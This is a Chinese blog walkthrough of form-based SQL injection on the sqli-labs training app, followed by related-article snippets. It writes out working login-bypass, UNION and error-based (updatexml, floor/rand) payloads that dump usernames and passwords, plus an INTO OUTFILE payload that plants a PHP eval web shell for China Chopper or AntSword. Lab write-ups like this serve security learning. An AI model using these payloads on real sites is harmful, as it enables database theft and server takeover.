基于表单的sql注入

最新推荐文章于 2024-07-09 10:00:27 发布
最新推荐文章于 2024-07-09 10:00:27 发布
阅读量935 收藏 1
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44574152/article/details/118523262
版权

前言:题目来源sqli-labs-master第10/11/12/13/14题,不能用联合就报错,方法如下:
在这里插入图片描述
尝试是否有万能密码,然后考虑联合注入,然后尝试报错注入这里两种方式我都讲解一下。
uname=' or 1=1 #&passwd=admin&submit=Submit
这里有个小问题就是–+不能用,不知道为什么,这里万能密码是可以的
,来试试联合注入。

联合注入

uname=' union select 1,2 #&passwd=admin&submit=Submit
在这里插入图片描述

成功,接下来就是爆库了,表 uname=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = database()) #&passwd=admin&submit=Submit

在这里插入图片描述

字段uname=' union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 'users') #&passwd=admin&submit=Submit
在这里插入图片描述
报错注入就是这点不好,只能显示30位,后面的显示不出来,后面讲解怎么办。
爆库uname=' union select 1,(select group_concat(username,'%20',password) from users) #&passwd=admin&submit=Submit
这里要注意这里的users是没有引号的,上面是有的,至于为啥我也不清楚
在这里插入图片描述

报错注入

首先爆表uname=' and updatexml('',concat('~',( select group_concat(table_name) from information_schema.tables where table_schema=database() )),'') #&passwd=admin&submit=Submit
在这里插入图片描述
然后爆字段uname=' and updatexml('',concat('~', (select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user','current_connections','total_connections') ) ),'') #&passwd=admin&submit=Submit
有点长,因为不带not in的话显示不下后面的username和password

在这里插入图片描述

另一种报错注入,基于floor,rand的uname=admin" and (select count(*) from information_schema.tables group by concat((select group_concat(username,'%20',password) from users ) ,floor(rand(0)*2)) ) #&passwd=admin&submit=Submit
但是这个出问题了 说子查询超了一行
在这里插入图片描述

可以插入一句话木马

uname=' union select 1, "<?php @eval($_POST['ring']); ?>" into outfile "D://phpstudy_pro//WWW//ring.php" #&passwd=admin&submit=Submit
在这里插入图片描述
然后用菜刀或者antsword

TOKOKOKO
关注
专栏目录
Web入门 SQL注入 表单含义
Bald__girl的博客
11-26 434
一、表单: 主要负责数据采集,由表单标签、表单域、表单按钮三部分组成。 1、表单标签 功能:用于申明表单,定义采集数据的范围,也就是和里面包含的数据将被提交到服务器或者电子邮件里。 语法:<FORM ACTION="UPL"METHOD=“GET|POST"ENCTYPE=“MIME"TARGET=”…”>… 2、表单表单域包含了文本框、多行文本框、密码框、隐藏域、复选框、单选框和...
利用SQL注入漏洞登录后台
weixin_33787529的博客
04-17 4453
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
xiaoganbuaiuk的博客
07-09 2504
SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。
SQL注入基础四---PHP表单验证
qq_41759633的博客
08-04 237
什么是表单 表单在网页中注意负责数据采集功能。 一个表单有三个基本组成部分 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法. <fomr action="URL" method="GET/POST" enctype="multipart/form-data">` 属性 值 描述 action URL 表单提交的目的地 met...
提交表单时处理sql注入
weixin_34186128的博客
07-20 299
1 public class AntiSqlInject 2 { 3 public HttpRequest Request; 4 5 public AntiSqlInject(HttpRequest requestPage) 6 { 7 Request = requestPage; ...
注入的几条简单语句,不用像网上那样复杂
得峰的专栏 [网络收藏]
05-04 737
一、版本url/1.asp?id=1 and @@VERSION>0二、跨库url/1.asp?id=1 and 1=(select db_name(n))n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?三、列名url/1.asp?id=1 and 1=(select col_name(object_id(表名),n) 表名可以换成16进制。像bbsuser=0x6200620
基于爬虫的sql注入漏洞检测工具
05-16
在这个案例中,爬虫不是为了抓取网页信息,而是遍历网站的可能入口点(如URL、表单参数等),模拟用户的各种输入,以触发潜在的SQL注入点。爬虫会生成并尝试各种可能的SQL注入 payload,这些payload设计用于检测...
基于语义分析的SQL注入行为检测方案研究.pdf
09-19
SQL注入攻击是一种常见的Web安全威胁,攻击者通过在Web表单输入或URL查询字符串中插入恶意SQL代码片段,以达到对数据库未经授权的操作。例如,通过这种攻击方式,攻击者可以盗取用户信息、获取系统权限以及篡改网页...
论文研究-基于机器学习的SQL注入检测技术研究 .pdf
08-15
SQL注入是一种攻击方法,通过在Web表单输入或页面请求的参数中插入SQL语句片段,攻击者试图对数据库执行未授权的SQL命令。这种攻击利用了应用程序对用户输入数据的处理不当。尽管许多开发者和安全专家已经意识到SQL...
基于隐马尔可夫模型的新型SQL注入攻击检测方法.pdf
09-19
SQL注入攻击是一种常见的网络攻击方式,攻击者通过插入恶意的SQL代码到Web表单或URL中,以此来欺骗数据库服务器执行非法的数据库操作。由于SQL注入攻击的普遍性和危害性,其在OWASP(开放式网络应用安全项目)的十大...
基于CNN的SQL注入检测.pdf
09-19
SQL注入是一种常见的网络安全攻击手段,它主要针对基于SQL语言的数据库服务器。攻击者通过在Web表单输入或页面请求的查询字符串中插入恶意的SQL代码片段,欺骗服务器执行非法的SQL命令。SQL注入攻击的危害性极大,它...
post表单防止注入
01-22
post表单,这个不知道大家会不会,传上来分享一下,呵呵
html 表单注入,csrf表单注入
weixin_34138673的博客
06-25 422
将生成的唯一token传入后台隐藏表单,并保存在session中,接受的时候判断与之前的是否相同session_start();if (_POST['token'] == name = strip_tags(name = substr(name = cleanHex($name);}else{//stop all processing! remote form posting attempt!}}...
表单注入——sqli-labs第11~16关
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-28 1778
1、观察是post还是get 可以看url的变化,或者看源码 xxxx’ order by 10# ’ order by 2#
SQL注入之提交方式的注入
afei001
04-29 713
常见的提交方式及注入 (1)get—get是从服务器上获取数据,不和服务器产生交互; get注入:平时访问网页测试注入点,对它进行注入就是get注入方式。 (2)post—post是向服务器传送数据。post提交方式主要适用于表单的提交; post注入:主要用于登录框的注入。 (3)cookie—cookie提交用于账号密码的cook...
jquery 动态表单数据注入(己修改)
dxking100的博客
06-20 295
1.标准的html。 2.用户可以html自写义枚举和连接数据库为select、checkbox、radio等标签进行注入。 3.服务端返数据(json格式)html自动填充。 4.数据交互时以ajax方式传递。 Insert title here jsonToSelectHtml = function(id, data) {//json转为select的h...
PHP表单验证实例预防SQL注入的小经验
u010497465的博客
07-18 414
PHP表单中需引起注重的地方? SERVER[&quot;PHPSELF&quot;]变量有可能会被黑客使用!当黑客使用跨网站脚本的HTTP链接来攻击时,_SERVER[&quot;PHP_SELF&quot;] 变量有可能会被黑客使用! 当黑客使用跨网站脚本的HTTP链接来攻击时,S​ERVER["PHPS​ELF"]变量有可能会被黑客使用!当黑客使用跨网站脚本的...
系统安全实验——Web表单SQL注入
IT_GIRL_XYX的博客
04-12 625
打开浏览器,进入靶机ip对应的网页,对其后台的数据库进行注入攻击,得到flag。
php表单安全验证,PHP.form表单参数安全验证函数,mysql防止sql注入
weixin_39664995的博客
03-12 168
一.form表单参数安全验证函数(防止sql注入等等)!/***表单参数安全判断,防止sql注入:方法一(推荐)*author:xiaochuan*@param:mixed$value参数值*@param:array$rules检测规则*return:boolean*/functioncheck_param($value,$rules=''){$rules=em...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值